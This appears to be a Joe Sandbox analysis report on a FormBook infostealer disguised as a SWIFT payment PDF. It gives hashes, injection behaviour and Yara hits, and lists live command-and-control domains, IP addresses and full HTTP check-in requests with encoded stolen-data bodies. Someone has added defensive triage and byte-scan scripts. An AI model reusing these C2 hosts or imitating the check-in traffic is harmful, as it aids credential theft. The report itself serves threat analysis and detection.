Windows Analysis Report
swift_payment_pdf.exe

Overview

General Information

Sample name: swift_payment_pdf.exe
Analysis ID: 1467534
MD5: 8e32f87b4f51fac392122d3c43b2e54f
SHA1: ac11a7300dbec0d2b67e549b97d3a1ab4e30c94a
SHA256: e7c888a111eeb26eec94afc97e0f9b838fda41ab74e083cb5b94f06800890d2d
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Process Tree

  • System is w10x64
  • swift_payment_pdf.exe (PID: 7344 cmdline: "C:\Users\user\Desktop\swift_payment_pdf.exe" MD5: 8E32F87B4F51FAC392122D3C43B2E54F)
    • swift_payment_pdf.exe (PID: 7840 cmdline: "C:\Users\user\Desktop\swift_payment_pdf.exe" MD5: 8E32F87B4F51FAC392122D3C43B2E54F)
      • AbWHWpocGREf.exe (PID: 5596 cmdline: "C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • explorer.exe (PID: 7980 cmdline: "C:\Windows\SysWOW64\explorer.exe" MD5: DD6597597673F72E10C9DE7901FBA0A8)
          • AbWHWpocGREf.exe (PID: 2032 cmdline: "C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 8156 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
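The tree above is the chain a responder would have to reconstruct from endpoint telemetry: the sample respawns its own image, hands off to a copy under a random Program Files (x86) directory, and from there starts the 32-bit explorer.exe from SysWOW64, which then spawns the next stage and a browser. The following is an added example, not part of the Joe Sandbox report, that encodes the tree as records (parent/child taken from the indentation) and applies three checks this chain trips: explorer.exe running from a path other than C:\Windows\explorer.exe, explorer.exe started by something other than userinit.exe/winlogon.exe, and a process that starts a second copy of its own image (the suspended-mode self-spawn the signatures list). The random-directory heuristic and its entropy threshold are this example's own choices, not Joe Sandbox rules.

```python
"""
Process-tree triage for the injection chain shown in the report.
Added example: TREE is transcribed from the report; the rules are this
example's own hunting heuristics, not Joe Sandbox signatures.
"""
import math
import re
from collections import Counter
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: Optional[int]
    image: str   # image path exactly as launched
    md5: str


# Transcribed from the report's process tree (parent inferred from indentation).
TREE = [
    Proc(7344, None, r"C:\Users\user\Desktop\swift_payment_pdf.exe", "8E32F87B4F51FAC392122D3C43B2E54F"),
    Proc(7840, 7344, r"C:\Users\user\Desktop\swift_payment_pdf.exe", "8E32F87B4F51FAC392122D3C43B2E54F"),
    Proc(5596, 7840, r"C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe", "32B8AD6ECA9094891E792631BAEA9717"),
    Proc(7980, 5596, r"C:\Windows\SysWOW64\explorer.exe", "DD6597597673F72E10C9DE7901FBA0A8"),
    Proc(2032, 7980, r"C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe", "32B8AD6ECA9094891E792631BAEA9717"),
    Proc(8156, 7980, r"C:\Program Files\Mozilla Firefox\Firefox.exe", "C86B1BE9ED6496FE0E0CBE73F81D8045"),
]

# Where the real shell lives and who normally starts it.
EXPLORER_PATH = r"c:\windows\explorer.exe"
EXPLORER_PARENTS = {"userinit.exe", "winlogon.exe", "explorer.exe"}

# Heuristic (this example's own): a long, letters-only subdirectory directly under Program Files.
RANDOM_DIR_RE = re.compile(r"^c:\\program files( \(x86\))?\\([a-z]{16,})\\", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def shannon_entropy(s: str) -> float:
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def random_looking_dir(image: str) -> bool:
    m = RANDOM_DIR_RE.match(image)
    return bool(m) and shannon_entropy(m.group(2).lower()) > 3.8


def triage(tree: List[Proc]) -> List[Tuple[int, str]]:
    """Return (pid, reason) findings for every process that trips a check."""
    by_pid = {p.pid: p for p in tree}
    findings: List[Tuple[int, str]] = []
    for p in tree:
        parent = by_pid.get(p.ppid) if p.ppid is not None else None
        if basename(p.image) == "explorer.exe":
            if p.image.lower() != EXPLORER_PATH:
                findings.append((p.pid, f"explorer.exe running from {p.image} instead of {EXPLORER_PATH}"))
            if parent is not None and basename(parent.image) not in EXPLORER_PARENTS:
                findings.append((p.pid, f"explorer.exe spawned by {basename(parent.image)} (pid {parent.pid})"))
        if parent is not None and parent.image.lower() == p.image.lower():
            findings.append((p.pid, "self-spawn of the same image (suspended-mode injection pattern)"))
        if random_looking_dir(p.image):
            findings.append((p.pid, "executable under a random-looking Program Files directory"))
    return findings


if __name__ == "__main__":
    for pid, why in triage(TREE):
        print(f"PID {pid}: {why}")
```

On the report's tree this flags PID 7840 (self-spawn), PID 7980 twice (SysWOW64 path and a non-shell parent) and PIDs 5596 and 2032 (random directory), while the original sample and Firefox stay clean. In telemetry the same checks map directly onto process-creation events (Sysmon event 1 or the EDR equivalent) keyed on image path and parent image.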
Yara matches in memory dumps (Source | Rule | Description | Author; 12 entries in the full report, first five rows shown)
00000007.00000002.3554688554.0000000003320000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000007.00000002.3554688554.0000000003320000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  0x2ac30: $a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  0x142df: $a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000005.00000002.2253099345.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000005.00000002.2253099345.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  0x2e043: $a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  0x176f2: $a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000007.00000002.3553452846.0000000002EF0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security

Yara matches in unpacked PEs (Source | Rule | Description | Author)
5.2.swift_payment_pdf.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
5.2.swift_payment_pdf.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  0x2d243: $a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  0x168f2: $a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
5.2.swift_payment_pdf.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
5.2.swift_payment_pdf.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  0x2e043: $a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  0x176f2: $a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

No Sigma rule has matched
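The two hex strings above ($a2 and $a3 of Windows_Trojan_Formbook_1112e116) are the only rule content the report exposes; the rule's own condition is not shown. Note that each string sits 0xE00 bytes further into the raw unpack (0x2e043, 0x176f2) than into the mapped unpack (0x2d243, 0x168f2), which is the file-to-virtual section delta of the dumped image, so offsets from one view cannot be pasted into the other. The following is an added example, not part of the report, that scans a buffer for exactly those byte patterns and reports every hit offset; the sample buffer it builds is constructed here, not a real dump.

```python
"""
Offset scan for the two Windows_Trojan_Formbook_1112e116 strings listed in the
report. Added example: the byte patterns are copied from the report; the rule's
condition is not shown there, so this only reports which strings hit and where.
"""
import re
from typing import Dict, List

# Hex strings exactly as they appear in the report's Yara match table.
FORMBOOK_STRINGS = {
    "$a2": "74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55",
    "$a3": "1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01",
}


def hex_to_bytes(s: str) -> bytes:
    return bytes.fromhex(s.replace(" ", ""))


def scan(buf: bytes, patterns: Dict[str, str] = FORMBOOK_STRINGS) -> Dict[str, List[int]]:
    """Return every offset at which each pattern occurs (overlapping hits included)."""
    hits: Dict[str, List[int]] = {}
    for name, hexstr in patterns.items():
        # Zero-width lookahead so back-to-back or overlapping occurrences are all reported.
        needle = re.compile(b"(?=" + re.escape(hex_to_bytes(hexstr)) + b")")
        hits[name] = [m.start() for m in needle.finditer(buf)]
    return hits


def scan_file(path: str, patterns: Dict[str, str] = FORMBOOK_STRINGS) -> Dict[str, List[int]]:
    """Scan a memory dump or unpacked PE on disk."""
    with open(path, "rb") as f:
        return scan(f.read(), patterns)


def build_sample(offsets: Dict[str, int], size: int = 0x30000) -> bytes:
    """Constructed test buffer: zero-filled, with each named pattern planted at the given offset."""
    buf = bytearray(size)
    for name, off in offsets.items():
        pat = hex_to_bytes(FORMBOOK_STRINGS[name])
        buf[off:off + len(pat)] = pat
    return bytes(buf)


if __name__ == "__main__":
    # Plant the strings where the report found them in the mapped unpack.
    sample = build_sample({"$a2": 0x2d243, "$a3": 0x168f2})
    for name, offs in scan(sample).items():
        print(name, [hex(o) for o in offs])
```

Pointing scan_file at a dump exported from the report would reproduce the offsets in the table; on a live host the same call over a process memory read gives a quick confirmation before a full Yara pass.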
Snort IDS alerts, ordered by time (all TCP to destination port 80, classtype "A Network Trojan was detected"; SID 2855464 = ETPRO TROJAN FormBook CnC Checkin (POST) M3, SID 2855465 = ETPRO TROJAN FormBook CnC Checkin (GET) M2):
Timestamp                  SID      Source port
07/04/24-12:35:55.019985   2855465  60619
07/04/24-12:36:10.661734   2855464  60620
07/04/24-12:36:13.202756   2855464  60621
07/04/24-12:36:18.264786   2855465  60623
07/04/24-12:36:24.114076   2855464  60624
07/04/24-12:36:26.653593   2855464  60625
07/04/24-12:36:31.720572   2855465  60627
07/04/24-12:37:01.781228   2855464  60629
07/04/24-12:37:07.168398   2855465  60631
07/04/24-12:37:13.031456   2855464  60632
07/04/24-12:37:20.644937   2855465  60635
07/04/24-12:37:25.721255   2855464  60636
07/04/24-12:37:28.307762   2855464  60637
07/04/24-12:37:46.701989   2855464  60640
07/04/24-12:37:49.265901   2855464  60641
07/04/24-12:37:54.731409   2855465  60643
07/04/24-12:38:00.723849   2855464  60644

            AV Detection

Source: swift_payment_pdf.exe | Avira: detected
Source: http://www.cheapdesklamp.shop/9nq7/?LtQxGF=3WbZRu4mrDqEA1Ay7ye2LS4QzFLdLuukgLPU+Ee+5nDYiFfgQ/T3sQVzU9oLEM0lY8+GADXgUVgfoHaw0lWmg2ENHn4ynM4ZVTokb9t9TCHuPL1ipqofA3g=&tDVH=AxaL | Avira URL Cloud: Label: malware
Source: http://www.cheapdesklamp.shop/9nq7/ | Avira URL Cloud: Label: malware
Source: https://www.enrich-pet.com/qrvt/?LtQxGF=HKECkscmwzLra6NzkhZq3iBCIkzhkrvRsiPWEPVOhy8HPvsuERt4M3iNy9vR | Avira URL Cloud: Label: malware
Source: http://www.enrich-pet.com/qrvt/?LtQxGF=HKECkscmwzLra6NzkhZq3iBCIkzhkrvRsiPWEPVOhy8HPvsuERt4M3iNy9vRPczT41Pma1tHEzPhIwEcWnI00ZdIodjuVJj7fI0Qa0rGd4Hyi3029DaEicY=&tDVH=AxaL | Avira URL Cloud: Label: malware
Source: www.enrich-pet.com | Virustotal: Detection: 5%
Source: swift_payment_pdf.exe | Virustotal: Detection: 26%
Source: Yara match | File source: 5.2.swift_payment_pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.swift_payment_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.3554688554.0000000003320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2253099345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3553452846.0000000002EF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.3556641408.0000000004AE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3554923179.0000000004D10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2253540662.0000000001270000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2254428073.0000000002CB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: swift_payment_pdf.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: swift_payment_pdf.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: explorer.pdbUGP | source: AbWHWpocGREf.exe, 00000006.00000003.2193822463.000000000520F000.00000004.00000001.00020000.00000000.sdmp, AbWHWpocGREf.exe, 00000006.00000003.2192638369.0000000004DAB000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: iDIX.pdb | source: swift_payment_pdf.exe
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb | source: AbWHWpocGREf.exe, 00000006.00000000.2178286710.00000000001CE000.00000002.00000001.01000000.0000000C.sdmp, AbWHWpocGREf.exe, 00000008.00000000.2318584238.00000000001CE000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: iDIX.pdbSHA256 | source: swift_payment_pdf.exe
Source: Binary string: wntdll.pdbUGP | source: swift_payment_pdf.exe, 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2255178706.0000000004DF1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3555138631.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3555138631.000000000513E000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2253539982.0000000004C4C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: swift_payment_pdf.exe, swift_payment_pdf.exe, 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, explorer.exe, 00000007.00000003.2255178706.0000000004DF1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3555138631.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3555138631.000000000513E000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2253539982.0000000004C4C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: explorer.pdb | source: AbWHWpocGREf.exe, 00000006.00000003.2193822463.000000000520F000.00000004.00000001.00020000.00000000.sdmp, AbWHWpocGREf.exe, 00000006.00000003.2192638369.0000000004DAB000.00000004.00000001.00020000.00000000.sdmp
Note on the Chrome.pdb entry: that PDB path belongs to Joe Security's own FakeChrome tool and is read from the mapped image of AbWHWpocGREf.exe, so the binary at that path (MD5 32B8AD6ECA9094891E792631BAEA9717) is a copy of a sandbox-provided executable, not an attacker-built file; do not carry that hash into indicator lists. The sample's own PDB name (iDIX.pdb) and the random install directory are the only file-level artifacts here that came from the malware.
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_02F0BF90 FindFirstFileW, FindNextFileW, FindClose
Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 4x nop then xor esi, esi (5_2_00418530)
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 4x nop then xor eax, eax (7_2_02EF9770)
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 4x nop then mov ebx, 00000004h (7_2_04DF0548)

            Networking

Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:60619 -> 34.149.87.45:80
Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:60620 -> 3.33.130.190:80
Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:60621 -> 3.33.130.190:80
Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:60623 -> 3.33.130.190:80
Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:60624 -> 116.213.43.190:80
Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:60625 -> 116.213.43.190:80
Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:60627 -> 116.213.43.190:80
Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:60629 -> 172.80.82.186:80
Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:60631 -> 172.80.82.186:80
Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:60632 -> 194.195.220.41:80
Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:60635 -> 194.195.220.41:80
Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:60636 -> 162.0.236.122:80
Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:60637 -> 162.0.236.122:80
Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:60640 -> 52.1.217.30:80
Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:60641 -> 52.1.217.30:80
Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:60643 -> 52.1.217.30:80
Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:60644 -> 23.226.70.194:80
Source: DNS query: www.tofcomy.xyz
Source: Joe Sandbox View | IP Address: 34.149.87.45
Source: Joe Sandbox View | IP Address: 162.0.236.122
Source: Joe Sandbox View | ASN Name: NEXINTO-DE
Source: Joe Sandbox View | ASN Name: AMAZON-AESUS
Source: Joe Sandbox View | ASN Name: ATGS-MMD-ASUS
Source: Joe Sandbox View | ASN Name: NAMECHEAP-NETUS
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (10 occurrences)
Source: global traffic | HTTP traffic detected. All seven GET check-ins below carry the same headers:
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-US
  Connection: close
  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
  GET /qrvt/?LtQxGF=HKECkscmwzLra6NzkhZq3iBCIkzhkrvRsiPWEPVOhy8HPvsuERt4M3iNy9vRPczT41Pma1tHEzPhIwEcWnI00ZdIodjuVJj7fI0Qa0rGd4Hyi3029DaEicY=&tDVH=AxaL HTTP/1.1 | Host: www.enrich-pet.com
  GET /jdip/?LtQxGF=W2aYirCPXKJiAM+1zI/AgBHM8/N+99M0G00tOgURX8ZkKPjyDhoW8AacjBkWD6QeLNKPcx0xYFVxMGjx+jrAzlAoi3E+4FlvpErxWC7md5KahWwglUqmq9c=&tDVH=AxaL HTTP/1.1 | Host: www.alanbeanart.com
  GET /d8kh/?LtQxGF=Dj9s4sQnIR+vsDnKwlk6Nlhqw7itdOFaW/ig+XnRtKCOHSdW0TDTG1cm2v2szq88ld3O918FFXWQyjmpenJ9MCf4z9ns+SbMecfFG1uyoV1oJcUCPfEdpdE=&tDVH=AxaL HTTP/1.1 | Host: www.qaronvc.lol
  GET /rlze/?LtQxGF=aIyAcRArRtIGvQhfdflYxlfrxIZLeHRFwP1NsuYwxTNgARVeV6obq7xFZv4/a30th0BoYK05fy/0IwAkOE+OBI8+L6UIixinPDwn66JMG/Wbc84G9m2CbnU=&tDVH=AxaL HTTP/1.1 | Host: www.piqia.top
  GET /9nq7/?LtQxGF=3WbZRu4mrDqEA1Ay7ye2LS4QzFLdLuukgLPU+Ee+5nDYiFfgQ/T3sQVzU9oLEM0lY8+GADXgUVgfoHaw0lWmg2ENHn4ynM4ZVTokb9t9TCHuPL1ipqofA3g=&tDVH=AxaL HTTP/1.1 | Host: www.cheapdesklamp.shop
  GET /gw8h/?LtQxGF=zGt49IFm93SrBWz0hF/Exo3fFaLGg1tTuVJPwAsKzCbkUXUSx9Ko4qRJeqPE/lbiWQNCjazmLjusy2a3r/X1USIwM3t9fhEbscmQM7mJ8GSckJYgF9Mlv0Q=&tDVH=AxaL HTTP/1.1 | Host: www.tofcomy.xyz
  GET /awho/?LtQxGF=HKpMDSWn02c1DGWlTfaJmDPYGspDHxl4M+sEuBij/TeAVpD3A/HhJ2RP1Yj8RhfHV3diV9uQCX+MCoKzKJx/zvHqsAsi9iTf04+ql3hj2gWbzWPZwBcwMrc=&tDVH=AxaL HTTP/1.1 | Host: www.wwfglobal.com
Source: global traffic | DNS traffic detected: DNS query: www.enrich-pet.com
Source: global traffic | DNS traffic detected: DNS query: www.alanbeanart.com
Source: global traffic | DNS traffic detected: DNS query: www.qaronvc.lol
Source: global traffic | DNS traffic detected: DNS query: www.piqia.top
Source: global traffic | DNS traffic detected: DNS query: www.cheapdesklamp.shop
Source: global traffic | DNS traffic detected: DNS query: www.tofcomy.xyz
Source: global traffic | DNS traffic detected: DNS query: www.wepayassessments.com
Source: global traffic | DNS traffic detected: DNS query: www.wwfglobal.com
Source: global traffic | DNS traffic detected: DNS query: www.chefmikesrecipes.com
Source: unknown | HTTP traffic detected:
  POST /jdip/ HTTP/1.1
  Host: www.alanbeanart.com
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate, br
  Origin: http://www.alanbeanart.com
  Connection: close
  Content-Length: 203
  Content-Type: application/x-www-form-urlencoded
  Cache-Control: no-cache
  Referer: http://www.alanbeanart.com/jdip/
  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
  Body (the raw bytes decode to this ASCII form string): LtQxGF=b0y4hcjTQNBTFPLr3cKPsHabx9YR7e8bY0kMWlECY74iGeHPL1JInS+6syVlbo5XIPW4HT8YaEdBGGTQgwbhmDQA0VQBo1FpkWrdVDOICKWX3iEw/lbkltaP4ccRWsgVCoEGS3CWHGG272s6AU9W86RqkvF6FNjFdsq7GB2q8o/BEdvqoP5y+KY4pFRTsaGWNw==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html;charset=UTF-8Server: Microsoft-IIS/7.5X-Powered-By: PHP/7.4.6Date: Thu, 04 Jul 2024 10:37:07 GMTConnection: closeContent-Length: 1611Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 2d 20 77 77 77 2e 70 69 71 69 61 2e 74 6f 70 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 62 6f 64 79 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 4d 69 63 72 6f 73 6f 66 74 20 59 61 68 65 69 22 2c 20 e5 be ae e8 bd af e9 9b 85 e9 bb 91 2c 20 54 61 68 6f 6d 61 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 20 47 42 2c 53 65 67 6f 65 20 55 49 22 2c 20 41 72 69 61 6c 2c 20 53 54 48 65 69 74 69 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 7d 0d 0a 2e 74 6f 70 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 33 36 36 63 63 3b 68 65 69 67 68 74 3a 33 30 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 30 70 78 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 41 2e 6c 3a 6c 69 6e 6b 20 7b 63 6f 6c 6f 72 3a 20 23 36 66 36 66 36 66 7d 0d 0a 41 2e 75 3a 6c 69 6e 6b 20 7b 63 6f 6c 6f 72 3a 20 67 
